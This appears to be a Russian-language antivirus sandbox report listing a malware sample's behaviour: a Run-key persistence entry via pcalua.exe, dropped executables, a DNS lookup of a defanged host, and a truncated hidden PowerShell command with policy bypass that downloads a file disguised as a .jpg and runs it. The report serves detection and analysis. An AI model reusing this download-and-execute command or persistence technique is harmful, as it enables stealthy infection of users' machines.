Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'chrom' = '<SYSTEM32>\pcalua.exe -a %HOMEPATH%\chrom.exe'
- http://cr##trt.com/9/9511378.jpg как %temp+%\name.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cr##trt.com/9/9511378.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Appl...
- %WINDIR%\explorer.exe
- addinprocess32.exe
- %TEMP%\name.exe
- %TEMP%\addinprocess32.exe
- %HOMEPATH%\chrom.exe
- %TEMP%\addinprocess32.exe
- http://cr##trt.com/9/9511378.jpg
- DNS ASK cr##trt.com
- '%TEMP%\name.exe'
- '%HOMEPATH%\chrom.exe'
- '%TEMP%\addinprocess32.exe'
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cr##trt.com/9/9511378.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Appl...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v chrom /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %HOMEPATH%\chrom.exe"
- '%WINDIR%\syswow64\reg.exe' ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v chrom /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %HOMEPATH%\chrom.exe"
- '%WINDIR%\syswow64\napstat.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%TEMP%\AddInProcess32.exe"